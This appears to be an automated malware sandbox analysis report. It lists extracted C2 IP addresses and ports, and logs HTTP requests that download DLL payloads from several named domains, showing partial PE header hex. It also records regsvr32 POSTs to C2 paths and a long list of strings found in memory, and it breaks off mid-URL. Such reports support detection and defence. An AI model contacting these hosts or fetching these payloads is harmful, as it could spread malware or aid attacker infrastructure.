Source: Malware configuration extractor IPs: 153.92.5.27:8080
Source: Malware configuration extractor IPs: 91.207.28.33:8080
Source: Malware configuration extractor IPs: 188.44.20.25:443
Source: Malware configuration extractor IPs: 153.126.146.25:7080
Source: Malware configuration extractor IPs: 163.44.196.120:8080
Source: Malware configuration extractor IPs: 172.105.226.75:8080
Source: Malware configuration extractor IPs: 115.68.227.76:8080
Source: Malware configuration extractor IPs: 159.65.140.115:443
Source: Malware configuration extractor IPs: 139.59.126.41:443
Source: Malware configuration extractor IPs: 197.242.150.244:8080
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 149.56.131.28:8080
Source: Malware configuration extractor IPs: 79.137.35.198:8080
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 160.16.142.56:8080
Source: Malware configuration extractor IPs: 159.89.202.34:443
Source: Malware configuration extractor IPs: 185.4.135.165:8080
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU
Source: Joe Sandbox View ASN Name: INPL-IN-APIshansNetworkIN INPL-IN-APIshansNetworkIN
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /tkafmhcgcid/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 284Host: 182.162.143.56
Source: global traffic HTTP traffic detected: POST /qqvehgyxm/bitss/ktcpnaio/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 304Host: 182.162.143.56
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 110.232.117.186 110.232.117.186
Source: Joe Sandbox View IP Address: 103.132.242.26 103.132.242.26
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 13 Nov 2022 18:26:51 GMTContent-Type: application/x-msdownloadContent-Length: 433152Connection: keep-aliveX-Powered-By: PHP/7.1.5Set-Cookie: 637136ebdcf92=1668364011; expires=Sun, 13-Nov-2022 18:27:51 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Sun, 13 Nov 2022 18:26:51 GMTExpires: Sun, 13 Nov 2022 18:26:51 GMTContent-Disposition: attachment; filename="EvvmhfKiKFhKrSuHfBq.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 98 df 3f f2 f9 b1 6c f2 f9 b1 6c f2 f9 b1 6c 9d 8f 1a 6c d6 f9 b1 6c 9d 8f 1b 6c a0 f9 b1 6c 9d 8f 2f 6c ff f9 b1 6c fb 81 32 6c f3 f9 b1 6c fb 81 22 6c fb f9 b1 6c f2 f9 b0 6c 91 f9 b1 6c 9d 8f 1e 6c f1 f9 b1 6c 9d 8f 2a 6c f3 f9 b1 6c 9d 8f 2b 6c f3 f9 b1 6c 9d 8f 2c 6c f3 f9 b1 6c 52 69 63 68 f2 f9 b1 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1c 29 6d 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 02 02 00 00 96 04 00 00 00 00 00 dc 5b 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 06 00 00 04 00 00 a7 e4 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 67 06 00 57 00 00 00 b4 5c 06 00 64 00 00 00 00 d0 06 00 54 02 00 00 00 a0 06 00 c4 1a 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 82 01 02 00 00 10 00 00 00 02 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c7 47 04 00 00 20 02 00 00 48 04 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 2f 00 00 00 70 06 00 00 1c 00 00 00 4e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c4 1a 00 00 00 a0 06 00 00 1c 00 00 00 6a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 74 65 78 74 00 00 00 00 1d 09 00 00 00 c0 06 00 00 0a 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 2e 72 73 72 63 00 00 00 54 02 00 00 00 d0 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?lllllll/ll2ll"l
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 13 Nov 2022 18:27:03 GMTContent-Type: application/x-msdownloadContent-Length: 433152Connection: keep-aliveSet-Cookie: 637136f7d44c4=1668364023; expires=Sun, 13-Nov-2022 18:28:03 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Sun, 13 Nov 2022 18:27:03 GMTExpires: Sun, 13 Nov 2022 18:27:03 GMTContent-Disposition: attachment; filename="2yXcjy57oZTTUNweDidCGUY.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 98 df 3f f2 f9 b1 6c f2 f9 b1 6c f2 f9 b1 6c 9d 8f 1a 6c d6 f9 b1 6c 9d 8f 1b 6c a0 f9 b1 6c 9d 8f 2f 6c ff f9 b1 6c fb 81 32 6c f3 f9 b1 6c fb 81 22 6c fb f9 b1 6c f2 f9 b0 6c 91 f9 b1 6c 9d 8f 1e 6c f1 f9 b1 6c 9d 8f 2a 6c f3 f9 b1 6c 9d 8f 2b 6c f3 f9 b1 6c 9d 8f 2c 6c f3 f9 b1 6c 52 69 63 68 f2 f9 b1 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1c 29 6d 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 02 02 00 00 96 04 00 00 00 00 00 dc 5b 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 06 00 00 04 00 00 a7 e4 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 67 06 00 57 00 00 00 b4 5c 06 00 64 00 00 00 00 d0 06 00 54 02 00 00 00 a0 06 00 c4 1a 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 82 01 02 00 00 10 00 00 00 02 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c7 47 04 00 00 20 02 00 00 48 04 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 2f 00 00 00 70 06 00 00 1c 00 00 00 4e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c4 1a 00 00 00 a0 06 00 00 1c 00 00 00 6a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 74 65 78 74 00 00 00 00 1d 09 00 00 00 c0 06 00 00 0a 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 2e 72 73 72 63 00 00 00 54 02 00 00 00 d0 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f6 07 00 00 00 e0 06 00 00 08 00 00 00 94 06 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?ll
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /img/O8G0RDZj7MYCuJyPoP/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: datie-tw.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-bin/WFFcGx/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: copunupo.ac.zmConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /upload/VaOfWEb3pW76UO/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sbm.xinmoshiwang.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/4cChao/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ly.yjlianyi.topConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49709 -> 45.63.99.23:7080
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 24
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 13 Nov 2022 18:26:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33
Source: unknown TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: regsvr32.exe, 0000000A.00000003.2012430306.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2065411138.0000000000A55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: regsvr32.exe, 0000000A.00000003.2012430306.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2065411138.0000000000A55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: regsvr32.exe, 0000000A.00000003.2012380786.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416327091.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012998285.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://182.162.143.56/
Source: regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066014930.00000000009FC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2415143218.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/
Source: regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F
Source: regsvr32.exe, 0000000A.00000003.2012257870.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012973980.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012356542.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416244353.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416063327.0000000000C34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012912551.0000000000C36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://182.162.143.56/tkafmhcgcid/
Source: regsvr32.exe, 0000000A.00000003.2012257870.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416063327.0000000000C34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012912551.0000000000C36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://182.162.143.56/tkafmhcgcid//~G
Source: regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1927895860.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/
Source: regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/2
Source: regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/b
Source: regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/
Source: regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/%
Source: regsvr32.exe, 0000000A.00000003.1927257389.0000000000C31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/tkafmhcgcid/
Source: regsvr32.exe, 0000000A.00000003.1927693196.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/tkafmhcgcid/8eM
Source: regsvr32.exe, 0000000A.00000003.1927257389.0000000000C31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/tkafmhcgcid/~G
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.aadrm.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.aadrm.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.cortana.ai
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.office.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.onedrive.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.scheduler.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://augloop.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cdn.entity.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://clients.config.office.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://config.edge.skype.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cortana.ai
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cortana.ai/api
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cr.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dev.cortana.ai
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://devnull.onenote.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://directory.services.
